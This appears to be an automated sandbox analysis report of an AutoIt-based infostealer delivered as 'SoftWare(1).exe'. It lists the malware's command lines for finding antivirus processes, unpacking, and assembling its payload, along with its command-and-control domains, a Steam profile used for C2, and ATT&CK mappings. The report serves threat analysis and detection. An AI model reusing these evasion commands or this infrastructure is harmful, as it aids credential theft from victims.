      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F75058 mov eax, dword ptr fs:[00000030h]12_2_00F75058
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_00FB20AA
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F82992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00F82992
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F70BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00F70BAF
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F70D45 SetUnhandledExceptionFilter,12_2_00F70D45
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F70F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00F70F91

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
      Source: Epson.com, 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: enterwahsh.biz
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00FB1B4D
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F5338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00F5338B
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBBBED SendInput,keybd_event,12_2_00FBBBED
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBECD0 mouse_event,12_2_00FBECD0
      Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Representation Representation.cmd & Representation.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 250478Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E KatrinaJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "JIM" Accepting Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Marco + ..\Dodge + ..\Loops + ..\Conclude + ..\Hydraulic + ..\Concern mJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\250478\Epson.com Epson.com mJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_00FB14AE
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FB1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00FB1FB0
      Source: Epson.com, 0000000C.00000003.2383733411.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000000.2067509917.0000000001013000.00000002.00000001.01000000.00000007.sdmp, Classifieds.9.dr, Epson.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: Epson.comBinary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F70A08 cpuid 12_2_00F70A08
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FAE5F4 GetLocalTime,12_2_00FAE5F4
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FAE652 GetUserNameW,12_2_00FAE652
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F8BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00F8BCD2
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Epson.comBinary or memory string: WIN_81
      Source: Epson.comBinary or memory string: WIN_XP
      Source: Epson.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: Epson.comBinary or memory string: WIN_XPe
      Source: Epson.comBinary or memory string: WIN_VISTA
      Source: Epson.comBinary or memory string: WIN_7
      Source: Epson.comBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FD2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00FD2263
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FD1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_00FD1C61
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts
      1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Exploitation for Privilege Escalation
      1
      Disable or Modify Tools
      21
      Input Capture
      2
      System Time Discovery
      Remote Services1
      Archive Collected Data
      2
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      2
      Valid Accounts
      1
      DLL Side-Loading
      11
      Deobfuscate/Decode Files or Information
      LSASS Memory1
      Account Discovery
      Remote Desktop Protocol21
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      Logon Script (Windows)2
      Valid Accounts
      2
      Obfuscated Files or Information
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin Shares3
      Clipboard Data
      3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
      Access Token Manipulation
      1
      DLL Side-Loading
      NTDS17
      System Information Discovery
      Distributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
      Process Injection
      11
      Masquerading
      LSA Secrets121
      Security Software Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Valid Accounts
      Cached Domain Credentials11
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
      Virtualization/Sandbox Evasion
      DCSync4
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
      Access Token Manipulation
      Proc Filesystem1
      Application Window Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
      Process Injection
      /etc/passwd and /etc/shadow1
      System Owner/User Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SoftWare(1).exe24%ReversingLabsWin32.Trojan.Generic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\250478\Epson.com0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Pack0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Spiritual0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://manyrestro.lat:443/api4100%Avira URL Cloudmalware
      https://lev-tolstoi.com:443/apiE100%Avira URL Cloudmalware
      https://talkynicer.lat/api100%Avira URL Cloudmalware
      https://talkynicer.lat:443/api100%Avira URL Cloudmalware
      https://slipperyloo.lat:443/api100%Avira URL Cloudmalware
      https://lev-tolstoi.com:443/api(D100%Avira URL Cloudmalware
      enterwahsh.biz0%Avira URL Cloudsafe
      https://shapestickyr.lat:443/api100%Avira URL Cloudmalware
      https://lev-tolstoi.com/api=100%Avira URL Cloudmalware
      https://lev-tolstoi.com/pis100%Avira URL Cloudmalware
      https://wordyfindy.lat:443/apiv100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      104.102.49.254
      truefalse
        high
        lev-tolstoi.com
        104.21.66.86
        truefalse
          high
          enterwahsh.biz
          unknown
          unknowntrue
            unknown
            wordyfindy.lat
            unknown
            unknownfalse
              high
              slipperyloo.lat
              unknown
              unknownfalse
                high
                curverpluch.lat
                unknown
                unknownfalse
                  high
                  DCNQHRSCEtLFmnzgofyjcgCPFn.DCNQHRSCEtLFmnzgofyjcgCPFn
                  unknown
                  unknowntrue
                    unknown
                    tentabatte.lat
                    unknown
                    unknownfalse
                      high
                      manyrestro.lat
                      unknown
                      unknownfalse
                        high
                        bashfulacid.lat
                        unknown
                        unknownfalse
                          high
                          shapestickyr.lat
                          unknown
                          unknownfalse
                            high
                            talkynicer.lat
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              slipperyloo.latfalse
                                high
                                https://steamcommunity.com/profiles/76561199724331900false
                                  high
                                  https://lev-tolstoi.com/apifalse
                                    high
                                    enterwahsh.biztrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    curverpluch.latfalse
                                      high
                                      tentabatte.latfalse
                                        high
                                        manyrestro.latfalse
                                          high
                                          bashfulacid.latfalse
                                            high
                                            wordyfindy.latfalse
                                              high
                                              shapestickyr.latfalse
                                                high
                                                talkynicer.latfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://player.vimeo.comEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://steamcommunity.com/?subsection=broadcastsEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://store.steampowered.com/subscriber_agreement/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.gstatic.cn/recaptcha/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.autoitscript.com/autoit3/Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drfalse
                                                                high
                                                                http://www.valvesoftware.com/legal.htmEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.youtube.comEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.comEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://talkynicer.lat/apiEpson.com, 0000000C.00000002.2468098452.0000000003912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://manyrestro.lat:443/api4Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://s.ytimg.com;Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiEpson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://steam.tv/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://lev-tolstoi.com/Epson.com, 0000000C.00000002.2468098452.0000000003903000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://store.steampowered.com/privacy_agreement/Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lev-tolstoi.com:443/apiEEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://steamcommunity.com:443/profiles/76561199724331900Epson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/points/shop/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.autoitscript.com/autoit3/XEpson.com, 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmp, Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Classifieds.9.dr, Epson.com.2.drfalse
                                                                                                            high
                                                                                                            http://nsis.sf.net/NSIS_ErrorErrorSoftWare(1).exefalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://sketchfab.comEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://lv.queniujq.cnEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.youtube.com/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/privacy_agreement/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/recaptcha/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://checkout.steampowered.com/Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://shapestickyr.lat:443/apiEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  unknown
                                                                                                                                  https://store.steampowered.com/;Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/about/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/my/wishlist/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://help.steampowered.com/en/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://steamcommunity.com/market/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/news/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://store.steampowered.com/subscriber_agreement/Epson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgEpson.com, 0000000C.00000002.2468469849.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://recaptcha.net/recaptcha/;Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/discussions/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/stats/Epson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amEpson.com, 0000000C.00000002.2467880406.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://talkynicer.lat:443/apiEpson.com, 0000000C.00000002.2467784156.00000000014B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://medal.tvEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://broadcast.st.dl.eccdnx.comEpson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
